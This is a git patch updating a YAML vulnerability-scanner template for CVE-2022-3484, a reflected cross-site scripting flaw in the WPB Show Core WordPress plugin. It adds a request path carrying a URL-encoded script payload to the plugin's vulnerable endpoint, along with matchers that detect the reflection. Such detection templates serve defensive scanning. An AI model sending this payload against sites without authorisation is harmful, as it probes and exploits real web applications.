From 9a2fdd421b609d0ff262c71e5467a28dacb1cdeb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 16:22:06 +0530 Subject: [PATCH] Update CVE-2022-3484.yaml --- cves/2022/CVE-2022-3484.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index ca5322d830..6484fd48d1 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -1,7 +1,7 @@ id: CVE-2022-3484 info: - name: WPB Show Core - Reflected Cross-Site Scripting + name: WPB Show Core - Cross-Site Scripting author: theamanrawat severity: medium description: | @@ -10,25 +10,21 @@ info: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2022-3484 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan + verified: true + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wpb-show-core requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=' + - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "")' - - 'contains(body, "wpb_jplayer_setting")' - 'contains(content_type, "text/html")' - condition: and \ No newline at end of file + - 'contains(body, "wpb_jplayer_setting")' + - 'contains(body, "")' + condition: and